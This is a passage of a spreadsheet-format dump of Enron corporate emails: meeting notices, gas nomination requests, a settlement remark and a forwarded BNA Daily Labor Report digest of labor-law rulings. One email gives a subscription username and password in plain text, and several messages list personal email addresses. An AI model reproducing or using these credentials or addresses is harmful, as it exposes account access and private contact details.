 implementing market design not be undertaken until the independent Board h=_x000D_
as been seated and given approval._x000D_
_x000D_
To the extent the facilities conveyed to ARTO via the Asset Purchase Agreem=_x000D_
ent impact market design, the transaction is problematic.  The purchased as=_x000D_
sets include certain software licenses, but these may not be "market design=_x000D_
"-sensitive._x000D_
_x000D_
Please let me know if you want the Midwest team to pursue this issue._x000D_
_x000D_
_x000D_
_x000D_
 &lt;&lt; File: ARTO MAIN.doc &gt;&gt;</t>
  </si>
  <si>
    <t>Re: Transport Originations - Concannon</t>
  </si>
  <si>
    <t>Jean, the $6M was a negotiated settlement between me and Marty Rosenberg of _x000D_
several old disputes as we moved forward in the restructuring of the _x000D_
Independence plant earlier in the year - Ruth added little other than _x000D_
administrative support.  _x000D_
_x000D_
Regards_x000D_
Delainey</t>
  </si>
  <si>
    <t>Wed, 15 Aug 2001 08:11:12 -0700 (PDT)</t>
  </si>
  <si>
    <t>Reminder-- All Employee Meeting</t>
  </si>
  <si>
    <t xml:space="preserve">To: All Enron Employees: _x000D_
This is a reminder that there will be an all-employee meeting at 10 a.m. Houston time, Thursday, Aug. 16 in the Hyatt Regency Houston's Imperial Ballroom, to review Enron's second quarter financial and operating highlights and update you on key issues affecting the company._x000D_
_x000D_
Accessing the Meeting via Streaming Video/Audio _x000D_
If you are a Houston-based employee and can't attend the meeting, or if you are located in London, Calgary, Omaha, New York or Portland (ENA), you can access the live event at &lt;http://home.enron.com/employeemeeting&gt;. Enron Europe employees will receive a follow-up message from their Public Relations team concerning online access to the meeting. _x000D_
_x000D_
Video Teleconferencing _x000D_
The meeting will be available by video teleconference to employees in Sao Paulo, Buenos Aires, and Dubai._x000D_
_x000D_
Audio Via Telephone_x000D_
For those of you who cannot access the live event, you may access the meeting over the telephone by dialing the following numbers:_x000D_
United States: 	(888) 428-4470_x000D_
_x000D_
International: 	(612) 332-0226  _x000D_
(612) 332-0107  _x000D_
(612) 332-0637  _x000D_
(612) 288-0329_x000D_
* The host will ask you what call or event you will be connecting to.  Reply Enron._x000D_
_x000D_
If you encounter technical difficulties, please contact your IT help desk. </t>
  </si>
  <si>
    <t>Tue, 28 Dec 1999 05:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>TRANSCO # behind CGV JAN 2000</t>
  </si>
  <si>
    <t>---------------------- Forwarded by Paul Drexelius/CES/ColumbiaGas on 12/28/99_x000D_
07:58 AM ---------------------------_x000D_
_x000D_
_x000D_
Heidi Boyd_x000D_
12/27/99 06:16 PM_x000D_
_x000D_
To: Noel Bartlo/CES/ColumbiaGas@ColumbiaGas, Paul_x000D_
Drexelius/CES/ColumbiaGas@ColumbiaGas_x000D_
cc:_x000D_
Subject: TRANSCO # behind CGV JAN 2000_x000D_
_x000D_
Hi Noel and Paul,_x000D_
_x000D_
I don't know who else to copy on this, please forward it to them and cc me if_x000D_
you don't mind._x000D_
_x000D_
I need   498 dth's/day total to be sent to CGV  for three of my customers  in_x000D_
Jan 2000.   Thanks!</t>
  </si>
  <si>
    <t>Mon, 8 May 2000 00:55:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Mexico</t>
  </si>
  <si>
    <t>Mark,_x000D_
_x000D_
Looks like interest in Mexico is increasing._x000D_
_x000D_
Can we please complete the preparation of an ETA/PA?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Dave</t>
  </si>
  <si>
    <t>Wed, 19 Dec 2001 10:44:33 -0800 (PST)</t>
  </si>
  <si>
    <t>Problems at OATI site</t>
  </si>
  <si>
    <t>They think it is a proxy server on my end and that if it is removed we should be fine._x000D_
_x000D_
Can you help me with this?</t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 05:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Larry Jester/Corp/Enron on 12/13/2000 _x000D_
01:37 PM ---------------------------_x000D_
_x000D_
_x000D_
Don Baughman@ECT_x000D_
12/11/2000 04:00 PM_x000D_
To: shannontyer@email.msn.com, mstewart@pdq.net, reidstav@houston.rr.com, _x000D_
travieso74@hotmail.com, PRHE@DYNEGY.COM, Kori Loibl/HOU/ECT@ECT, Patrick _x000D_
Hanse/HOU/ECT@ECT, Matt Lorenz/HOU/ECT@ECT, Larry Jester/Corp/Enron@ENRON, _x000D_
twomarshalls@hotmail.com, don.c.baughman@marshmc.com, _x000D_
baughmanpatricia@hotmail.com_x000D_
cc:  _x000D_
_x000D_
Subject: _x000D_
_x000D_
_x000D_
_x000D_
 - salmon.asf_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 4 Apr 2001 08:37:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'angela.hylton@enron.com'})</t>
  </si>
  <si>
    <t>PGE historicals</t>
  </si>
  <si>
    <t xml:space="preserve">Use this file, NOT the previous one sent.  Thanks._x000D_
_x000D_
Mat_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 2 Jul 2001 06:34:40 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mecole.brown@enron.com', 'gilda.parker@enron.com', 'bonnie.white@enron.com', 'bonne.castellano@enron.com', 'felecia.acevedo@enron.com', 'rick.johnson@enron.com', 'scott.walker@enron.com', 'michelle.cash@enron.com', 'kriste.sullivan@enron.com'})</t>
  </si>
  <si>
    <t>FW: July 2 -- BNA, Inc. Daily Labor Report</t>
  </si>
  <si>
    <t>_x000D_
User ID:  enrondlr_x000D_
PW:        bnaweb22_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"BNA Highlights" &lt;bhighlig@bna.com&gt;@ENRON [mailto:IMCEANOTES-+22BNA+20Highlights+22+20+3Cbhighlig+40bna+2Ecom+3E+40ENRON@ENRON.com] _x000D_
Sent:	Sunday, July 01, 2001 11:10 PM_x000D_
To:	BNA Highlights_x000D_
Subject:	July 2 -- BNA, Inc. Daily Labor Report_x000D_
_x000D_
_______________________________x000D_
_x000D_
DAILY LABOR REPORT_x000D_
Highlights &amp; Table of Contents_x000D_
July 2, 2001_x000D_
_______________________________x000D_
_x000D_
ISSN 1522-5968_x000D_
_x000D_
Registered Web subscribers can access the full text of these_x000D_
articles by using the URL link supplied._x000D_
_x000D_
Information about becoming a subscriber or signing up for a_x000D_
FREE Web trial is available at http://web.bna.com or call_x000D_
BNA Customer Relations at 1-800-372-1033, Mon. - Fri. 8:30_x000D_
am - 7:00 pm (ET)._x000D_
___________x000D_
_x000D_
HIGHLIGHTS_x000D_
___________x000D_
_x000D_
_x000D_
NLRB AGAIN RULES AGAINST LEE LUMBER BUT DECLINES BARGAINING_x000D_
ORDER_x000D_
_x000D_
Lee Lumber and Building Material Corp. illegally withdrew_x000D_
recognition of an incumbent union before a reasonable time_x000D_
for bargaining had passed, the National Labor Relations_x000D_
Board rules in its third decision in the longrunning case,_x000D_
but this time the board declines to impose an affirmative_x000D_
bargaining order ("Lee Lumber and Building Material Corp.,_x000D_
"334 N.L.R.B. No. 62, 6/28/01). On remand from the D.C._x000D_
Circuit, the board decides 4-0 "that when an employer has_x000D_
unlawfully refused to recognize or bargain with an incumbent_x000D_
union, a reasonable time for bargaining before the union's_x000D_
majority status can be challenged will be no less than six_x000D_
months, but no more than one year."_x000D_
_x000D_
The board says the length of time that would be reasonable_x000D_
depends on an analysis of several factors--whether the_x000D_
parties are bargaining for an initial agreement, the_x000D_
complexity of the issues being negotiated and the parties'_x000D_
bargaining procedures, the amount of time spent bargaining_x000D_
and the number of bargaining sessions, the amount of_x000D_
progress made in negotiations and how near the parties are_x000D_
to agreement, and the presence or absence of a bargaining_x000D_
impasse. Applying these factors, the board decides Lee_x000D_
Lumber did not bargain for a reasonable time before_x000D_
withdrawing recognition from United Brotherhood of_x000D_
Carpenters and Joiners Local 1027. . . . Page AA-1,  Text_x000D_
E-22_x000D_
_x000D_
http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j7h5j9__x000D_
_x000D_
http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j7c7u1__x000D_
_x000D_
_x000D_
FULL SEVENTH CIRCUIT SAYS BARGAINING PACT IRRELEVANT TO_x000D_
LIABILITY_x000D_
_x000D_
The full Seventh Circuit rules 6-3 to affirm a district_x000D_
court's decision that evidence regarding an employer's_x000D_
duties under a collective bargaining agreement was_x000D_
inadmissible to prove that the company reacted reasonably in_x000D_
failing to respond promptly to the misdeeds of a "serial_x000D_
harasser" ("EEOC v. Indiana Bell Tel. Co. Inc. d/b/a_x000D_
Ameritech Indiana,  "7th Cir. (en banc), No. 99-1155,_x000D_
6/27/01)._x000D_
_x000D_
Judge Easterbrook, in a portion of the ruling joined by four_x000D_
of the judges, rejects Ameritech Indiana's argument that the_x000D_
evidence is relevant to the issue of liability in sexual_x000D_
harassment cases brought under Title VII of the 1964 Civil_x000D_
Rights Act and affirms $15,000 in compensatory damages to_x000D_
three female Ameritech workers. However on a second issue,_x000D_
Easterbrook, joined by a different line up of five judges,_x000D_
reverses a $635,000 award in punitive damages against_x000D_
Ameritech, finding that evidence regarding arbitration and_x000D_
the collective bargaining agreement was admissible as to the_x000D_
issue of punitive damages._x000D_
_x000D_
Judge Flaum dissents in part, criticizing the majority's_x000D_
"sweeping dictate" that bargaining agreements are_x000D_
inadmissible in Title VII cases on the issue of liability._x000D_
Judge Rovner dissents on the issue of punitive damages,_x000D_
arguing that the trial court's refusal to admit the evidence_x000D_
was harmless  error.  . . . Page A-10,  Text E-7_x000D_
_x000D_
http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j7h3x6__x000D_
_x000D_
http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j6v2d9__x000D_
_x000D_
_x000D_
 JUSTICES WILL REVIEW ERISA PREEMPTION OF EXTERNAL REVIEW IN_x000D_
HEALTH CARE_x000D_
_x000D_
Amid heated debate in Congress over a patients' bill of_x000D_
rights, the Supreme Court decides to rule next term on_x000D_
whether the Employee Retirement Income Security Act preempts_x000D_
statutes adopted in at least 37 states requiring external,_x000D_
independent review of managed care organizations' medical_x000D_
necessity decisions ("Rush Prudential HMO Inc. v. Moran,_x000D_
"U.S., No. 00-1021, "cert. granted" 6/29/01)._x000D_
_x000D_
The high court will review whether Illinois' external review_x000D_
law is preempted by ERISA or whether it is "saved" from_x000D_
ERISA preemption because it regulates insurance, an area_x000D_
traditionally reserved for the states. The case arose after_x000D_
Eileen Moran tried to recover $94,841 in surgical costs she_x000D_
had paid after they were denied by Rush Prudential._x000D_
_x000D_
In adding the dispute to its 2001-2002 docket, the Supreme_x000D_
Court opts to rule in a case the Justice Department, in an_x000D_
amicus brief, had urged the justices not to accept, on_x000D_
grounds that external review currently is being debated in_x000D_
Congress.  . . . Page B-1_x000D_
_x000D_
http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j7f1m5__x000D_
_x000D_
_x000D_
BNA SURVEY NETS PREDICTIONS OF MODEST ECONOMIC REBOUND_x000D_
_x000D_
The sharp downturn in the nation's economy during the first_x000D_
half of 2001 is still not showing any signs of improvement,_x000D_
yet most economists and policymakers remain confident that_x000D_
growth will accelerate by the end of the year, according to_x000D_
BNA's mid-year economic outlook survey._x000D_
_x000D_
Among the 24 economists participating in the survey, all but_x000D_
one believe that growth will rebound by the end of the year_x000D_
to exceed the first quarter's anemic growth rate of 1.2_x000D_
percent . Prior to the fourth quarter, however, three of_x000D_
those economists fully expect to see data showing that the_x000D_
country had slipped into a mild recession during the second_x000D_
and third quarters. . . . Page D-1_x000D_
_x000D_
http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j7j3a8__x000D_
_x000D_
_x000D_
NO NEW TALKS SCHEDULED IN IBEW DISPUTE WITH CHICAGO ELECTRIC_x000D_
UTILITY_x000D_
_x000D_
Two days into a strike by Local 15 of the International_x000D_
Brotherhood of Electrical Workers, Chicago-based Midwest_x000D_
Generation Co. has "no timetable" for resuming negotiations_x000D_
over a new contract covering 1,150 of the electric utility's_x000D_
employees, a company spokesman says. The strike is "not_x000D_
about money," he says, but rather language that the union_x000D_
was attempting to insert in the contract that would restrict_x000D_
the company's use of outside contractors for work beyond the_x000D_
scope of normal power plant operations._x000D_
_x000D_
Maintaining that the company is misrepresenting its position_x000D_
in the dispute, Local 15 says no contract language has been_x000D_
proposed to impede or limit the use of outside contractors._x000D_
Midwest Generation, it insists, is refusing to bargain in_x000D_
good faith. While, the company attributes the strike to a_x000D_
"union failing to recognize that it no longer works in a_x000D_
utility environment, but in a competitive marketplace." . ._x000D_
. Page A-2_x000D_
_x000D_
http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j7b3m3__x000D_
_x000D_
_x000D_
SUPREME COURT LETS STAND NATIONWIDE ORDER AGAINST BEVERLY_x000D_
ENTERPRISES_x000D_
_x000D_
The U.S. Supreme Court lets stand a corporatewide remedial_x000D_
order imposed by the National Labor Relations Board against_x000D_
nursing home operator Beverly Enterprises for its widespread_x000D_
pattern of unfair labor practices ("Beverly Cal. Corp. v._x000D_
NLRB, "U.S., No. 00-1563, "cert. denied" 6/29/01). The_x000D_
Supreme Court denies Beverly's request for review of a_x000D_
Seventh Circuit ruling substantially upholding the board_x000D_
decision. The board found the company committed more than_x000D_
100 unfair labor practices involving 26 nursing homes_x000D_
nationwide._x000D_
_x000D_
The board first issued a corporatewide cease-and-desist_x000D_
order against Beverly in 1993, but the Second Circuit_x000D_
overturned it, finding the evidence insufficient for such a_x000D_
broad remedy. However, the Seventh Circuit in 2000 found_x000D_
mounting evidence that Beverly "continues to violate the law_x000D_
with regularity." The board was "entitled to conclude,_x000D_
especially after specific remedies in [the Second Circuit_x000D_
case] did not appear to stop the efforts from the company's_x000D_
central management to stop unions in any way possible, that_x000D_
the time was past for piecemeal relief," the Seventh Circuit_x000D_
said. . . . Page B-2,  Text E-1_x000D_
_x000D_
http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j6y7f6__x000D_
_x000D_
http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j6f8p7__x000D_
_x000D_
_x000D_
_________________x000D_
_x000D_
ALSO IN THE NEWS_x000D_
_________________x000D_
_x000D_
COMPENSATION: Private industry employers paid their workers_x000D_
an average of $20.81 an hour in March 2001, or about 4.8_x000D_
percent more than the average in March 2000, according to_x000D_
the Bureau of Labor Statistics. . . . Page D-16_x000D_
_x000D_
http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j7g6w0__x000D_
_x000D_
SAFETY &amp; HEALTH: The Labor Department is proposing to delay_x000D_
two job safety provisions guiding the recording of hearing_x000D_
loss and musculoskeletal disorders, saying it feared_x000D_
employer "uncertainty" over when to log those types of_x000D_
injuries. . . . Page A-3_x000D_
_x000D_
http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j7c5t2__x000D_
_x000D_
TEAMSTERS:  Labor Secretary Chao tells the International_x000D_
Brotherhood of Teamsters' convention that the Bush_x000D_
administration "won't always agree with you, but we'll_x000D_
always listen to what you have to say." . . . Page C-1_x000D_
_x000D_
http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j6c2c6__x000D_
_x000D_
_x000D_
_____x000D_
_x000D_
TEXT_x000D_
_____x000D_
_x000D_
SUPREME COURT: Summaries of labor and employment law cases_x000D_
in which Supreme Court denied review June 29, 2001. . . ._x000D_
Page E-1_x000D_
_x000D_
http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j6f8u2__x000D_
_x000D_
SEXUAL HARASSMENT: Seventh Circuit's decision in "EEOC v._x000D_
Indiana Bell Tel. Co. d/b/a Ameritech Indiana". . . . Page_x000D_
E-7_x000D_
_x000D_
http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j6v2d9__x000D_
_x000D_
UNFAIR LABOR PRACTICES: NLRB decision in " Lee Lumber and_x000D_
Building Material Corp." . . . Page E-22_x000D_
_x000D_
http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j7c7u1__x000D_
_x000D_
_x000D_
__________________x000D_
_x000D_
TABLE OF CONTENTS_x000D_
__________________x000D_
_x000D_
LEADING THE NEWS_x000D_
_x000D_
UNFAIR LABOR PRACTICES_x000D_
   NLRB rules Lee Lumber and Building Material Corp._x000D_
   illegally withdrew recognition of incumbent union before_x000D_
   reasonable time for bargaining passed, but declines to_x000D_
   impose affirmative bargaining order . . . Page AA-1,_x000D_
   Text E-7_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j7h5j9__x000D_
_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j6v2d9__x000D_
_x000D_
_x000D_
_____x000D_
_x000D_
NEWS_x000D_
_____x000D_
_x000D_
COMPENSATION_x000D_
   California Industrial Welfare Commission cancels meeting_x000D_
   for lack of quorum, directs staff to prepare report on_x000D_
   controversial interpretation of state wage-and-hour law_x000D_
   pertaining to exempt employees . . . Page A-4_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j7b8v8__x000D_
_x000D_
DISCRIMINATION_x000D_
   Eighth Circuit throws out most of $2.4 million sex and_x000D_
   race discrimination verdict against meat processor IBP_x000D_
   Inc. and sends damages issues back to trial because time_x000D_
   period jury used to assess damages was too long . . ._x000D_
   Page A-5_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j6g5t4__x000D_
_x000D_
   House Judiciary Committee approves bill (H.R. 7) that_x000D_
   would allow religious organizations to compete for_x000D_
   federal grants after narrowing ability of such_x000D_
   organizations to discriminate in employment . . . Page_x000D_
   A-10_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j7f5x8__x000D_
_x000D_
HEALTH CARE_x000D_
   Senate sets June 29 for end of debate and final vote to_x000D_
   approve Patients' Bill of Rights (S. 1052) legislation_x000D_
   before adjourning for July 4th recess . . . Page A-12_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j7j8w1__x000D_
_x000D_
HOTEL EMPLOYEES_x000D_
   Members of HERE Local 1 in Chicago elect international_x000D_
   trustee Henry Tamarin president of local, one of two_x000D_
   challengers expected to file post-election protests . . ._x000D_
   Page A-4_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j6z5a5__x000D_
_x000D_
PENSIONS_x000D_
   IRS issues final regulations (T.D. 8954) allowing defined_x000D_
   contribution and combined defined contribution/defined_x000D_
   benefit retirement plans to satisfy nondiscrimination_x000D_
   requirements based on plan benefits, rather than_x000D_
   contributions . . . Page A-7_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j6g0j5__x000D_
_x000D_
   IRS to publish sample amendments retirement plan sponsors_x000D_
   can adopt or use as models for individualized amendments_x000D_
   to incorporate provisions of new tax law and operate in_x000D_
   "good faith" reliance for 2002 plan year . . . Page A-8_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j6g1f1__x000D_
_x000D_
   Wisconsin Supreme Court rules county government cannot_x000D_
   deny pension benefits to discharged employees who meet_x000D_
   minimum requirements of creditable service for deferred_x000D_
   vested pension without first providing hearing to_x000D_
   determine whether employee has been discharged for cause_x000D_
   . . . Page A-9_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j7d6w6__x000D_
_x000D_
POLITICS_x000D_
   House Administration Committee reports out on party-line_x000D_
   votes two competing versions of campaign finance reform_x000D_
   legislation (H.R. 2360, H.R. 2356) that will be_x000D_
   considered on floor starting July 12 . . . Page A-6_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j6g1n4__x000D_
_x000D_
SAFETY &amp; HEALTH_x000D_
   General contractor pleads guilty to felony charge of_x000D_
   making false statements to federal safety inspector in_x000D_
   connection with November 1996 building collapse in_x000D_
   Brooklyn, N.Y., that injured 10 workers, one fatally . ._x000D_
   . Page A-9_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j7d3n4__x000D_
_x000D_
   Labor Department proposes to delay implementation of new_x000D_
   recordkeeping requirements for hearing loss and_x000D_
   musculoskeletal disorders because of employer_x000D_
   "uncertainty" over when injuries should be logged . . ._x000D_
   Page A-3_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j7c5t2__x000D_
_x000D_
SEX DISCRIMINATION_x000D_
   New Jersey Supreme Court rules male physician who claimed_x000D_
   he was forced out by medical partners because of his sex_x000D_
   did not waive right to sue under state law despite_x000D_
   signing arbitration agreement . . . Page A-1_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j3k5d9__x000D_
_x000D_
SEXUAL HARASSMENT_x000D_
   Full Seventh Circuit rules 6-3 that evidence regarding_x000D_
   employer's duties under union contract was inadmissible_x000D_
   to prove company reacted reasonably in failing to respond_x000D_
   promptly to misdeeds of "serial harasser" . . . Page_x000D_
   A-10,  Text E-22_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j7h3x6__x000D_
_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j7c7u1__x000D_
_x000D_
TAXES_x000D_
   CORRECTION In story appearing at 118 DLR C-1, 6/20/01,_x000D_
   that described employment-related provisions of tax_x000D_
   legislation signed into law June 7, the paragraph with_x000D_
   heading "Highly compensated employees" should be_x000D_
   disregarded . . . Page A-13_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j6g3c5__x000D_
_x000D_
UTILITIES_x000D_
   Chicago-based Midwest Generation Co. says it has "no_x000D_
   timetable" for resuming negotiations with IBEW for new_x000D_
   contract to cover 1,150 striking electric utility workers_x000D_
   . . . Page A-2_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j7b3m3__x000D_
_x000D_
_x000D_
______________x000D_
_x000D_
SUPREME COURT_x000D_
______________x000D_
_x000D_
ERISA_x000D_
   U.S. Supreme Court agrees to rule next term on whether_x000D_
   federal law preempts statutes adopted in at least 37_x000D_
   states requiring external, independent review of managed_x000D_
   care organizations' medical necessity decisions . . ._x000D_
   Page B-1_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j7f1m5__x000D_
_x000D_
UNFAIR LABOR PRACTICES_x000D_
   U.S. Supreme Court lets stand corporatewide remedial_x000D_
   order imposed by NLRB against nursing home operator_x000D_
   Beverly Enterprises for widespread pattern of unfair_x000D_
   labor practices . . . Page B-2,  Text E-1_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j6y7f6__x000D_
_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j6f8u3__x000D_
_x000D_
_x000D_
__________________x000D_
_x000D_
CONVENTION REPORT_x000D_
__________________x000D_
_x000D_
TEAMSTERS_x000D_
   Labor Secretary Chao tells IBT members at 26th union_x000D_
   convention Bush administration "won't always agree with_x000D_
   you, but we'll always listen to what you have to say" . ._x000D_
   . Page C-1_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j6c2c6__x000D_
_x000D_
_x000D_
______________x000D_
_x000D_
ECONOMIC NEWS_x000D_
______________x000D_
_x000D_
COMPENSATION_x000D_
   Labor Department's Bureau of Labor Statistics reports_x000D_
   private industry employers paid workers average of $20.81_x000D_
   per hour in March 2001, about 4.8 percent higher than_x000D_
   average in March 2000 . . . Page D-16_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j7g6w0__x000D_
_x000D_
ECONOMIC OUTLOOK_x000D_
   Most economists and policymakers remain confident growth_x000D_
   will accelerate by end of the year, despite sharp_x000D_
   downturn in nation's economy during the first half of_x000D_
   2001 that is not yet showing signs of improvement . . ._x000D_
   Page D-1_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j7j3a8__x000D_
_x000D_
GDP_x000D_
   Commerce Department's Bureau of Economic Analysis reports_x000D_
   U.S. gross domestic product adjusted for inflation rose_x000D_
   by 1.2 percent annual rate during first quarter of 2001,_x000D_
   down slightly from preliminary estimate of 1.3 percent ._x000D_
   . . Page D-4_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j6y7c0__x000D_
_x000D_
_x000D_
_____x000D_
_x000D_
TEXT_x000D_
_____x000D_
_x000D_
SUPREME COURT_x000D_
   Summaries of labor and employment law cases in which the_x000D_
   U.S. Supreme Court denied review June 29, 2001 . . . Page_x000D_
   E-1_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j5yb3__x000D_
_x000D_
SEXUAL HARASSMENT_x000D_
   Seventh Circuit's decision in "EEOC v. Indiana Bell Tel._x000D_
   Co. d/b/a/ Ameritech Indiana" . . . Page E-7_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j6v2d9__x000D_
_x000D_
UNFAIR LABOR PRACTICES_x000D_
   NLRB decision in "Lee Lumber and Building Material Corp."_x000D_
   . . . Page E-22_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j7c7u1__x000D_
_x000D_
_x000D_
_______________x000D_
_x000D_
TABLE OF CASES_x000D_
_______________x000D_
_x000D_
Arkansas Dep't of Educ. v. Jim C (U.S.) . . . Page E-1_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j6f8q7__x000D_
_x000D_
Augustus v. Surface Transp. Bd. (U.S.) . . . Page E-2_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j6f8r7__x000D_
_x000D_
Beverly Cal. Corp. v. NLRB (U.S.) . . . Page B-2,  text E-1_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j6y7f6__x000D_
_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j6f8u3__x000D_
_x000D_
Briley v. National Archives &amp; Records Admin. (U.S.) . . ._x000D_
Page E-5_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j6f8y7__x000D_
_x000D_
Brown v. Dep't of Navy (U.S.) . . . Page E-1_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j6f8r2__x000D_
_x000D_
Dierking v. Industrial Comm'n of Ariz. (U.S.) . . . Page E-5_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j6f8y2__x000D_
_x000D_
Dietelbach v. Ohio Edison Co. (U.S.) . . . Page E-3_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j6f8u7__x000D_
_x000D_
EEOC v. Indiana Bell Tel. Co. Inc. d/b/a Ameritech Ind. (7th_x000D_
Cir.) . . . Page A-10,  Text E-7_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j7h3x6__x000D_
_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j6v2d9__x000D_
_x000D_
Garfinkel v. Morristown Obstetrics &amp; Gynecology Assocs._x000D_
(N.J.) . . . Page A-1_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j3k5d9__x000D_
_x000D_
Gentile v. Quaker Oats Co. (U.S.) . . . Page E-2_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j6f8t7__x000D_
_x000D_
International Bhd. of Elec. Workers Local 134 v. Chathas_x000D_
(U.S.) . . . Page E-1_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j6f8p7__x000D_
_x000D_
Juno Marine Agency Inc. v. Taibl (U.S.) . . . Page E-3_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j6f8v2__x000D_
_x000D_
Lee Lumber and Bldg. Material Corp.  (334 N.L.R.B. No. 62) ._x000D_
. . Page AA-1,  Text E-22_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j7h5j9__x000D_
_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j7c7u1__x000D_
_x000D_
Madison v. IBP Inc. (8th Cir.) . . . Page A-5_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j6g5t4__x000D_
_x000D_
Milwaukee Dist. Council 48, Am. Fed'n of State, County, and_x000D_
Mun. Employees, AFSCME, AFL-CIO v. Milwaukee County (Wis.) ._x000D_
. . Page A-9_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j7d6w6__x000D_
_x000D_
Moore v. AFTRA Health and Ret. Funds (U.S.) . . . Page E-2_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j6f8t2__x000D_
_x000D_
Norfolk &amp; W. Ry. Co. v. Dye (U.S.) . . . Page E-3_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j6f8v7__x000D_
_x000D_
Parry v. Mohawk Motors of Mich. Inc. (U.S.) . . . Page E-4_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j6f8x2__x000D_
_x000D_
Pastorek v. Trail (U.S.) . . . Page E-3_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j6f8w2__x000D_
_x000D_
Relford v. Lexington-Fayette Urban County Gov't Civil Serv._x000D_
Comm'n (U.S.) . . . Page E-1_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j6f8q2__x000D_
_x000D_
Rush Prudential HMO Inc. v. Moran (U.S.) . . . Page B-1_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j7f1m5__x000D_
_x000D_
Turner v. Church of Jesus Christ of Latter-Day Saints (U.S.)_x000D_
. . . Page E-4_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j6f8w7__x000D_
_x000D_
Tuvell v. Microsoft Corp. (U.S.) . . . Page E-5_x000D_
